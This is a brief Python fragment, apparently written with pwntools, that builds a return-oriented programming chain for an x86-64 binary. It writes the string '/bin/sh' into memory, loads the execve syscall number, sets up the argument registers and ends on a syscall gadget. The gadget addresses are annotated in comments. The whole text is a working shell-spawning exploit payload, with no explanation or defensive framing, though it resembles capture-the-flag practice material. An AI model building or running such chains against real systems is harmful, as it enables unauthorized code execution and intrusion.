payload = p64(0x408aa2)
#0x0000000000408aa2: pop rsi; ret; 
payload += p64(0x460010)+p64(0x45b704)
# 0x000000000045b704: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x41c326)
# 0x000000000041c326: or qword ptr [rsi + 0x60], rax; add rsp, 8; ret; 
payload += p64(0x0)+p64(0x43db20)
# 0x000000000043db20: cmp dl, 0xfc; mov edx, 0; cmovne eax, edx; ret; 
payload += p64(0x45b704)
# 0x000000000045b704: pop rax; ret; 
payload += p64(0x3b)+p64(0x408aa2)
# 0x0000000000408aa2: pop rsi; ret; 
payload += p64(0x0)+p64(0x40fab8)
# 0x000000000040fab8: pop rdi; pop rbp; ret; 
payload += p64(0x460070)+p64(0x0)+p64(0x41e0d9)
# 0x000000000041e0d9: syscall; 
payload += b''
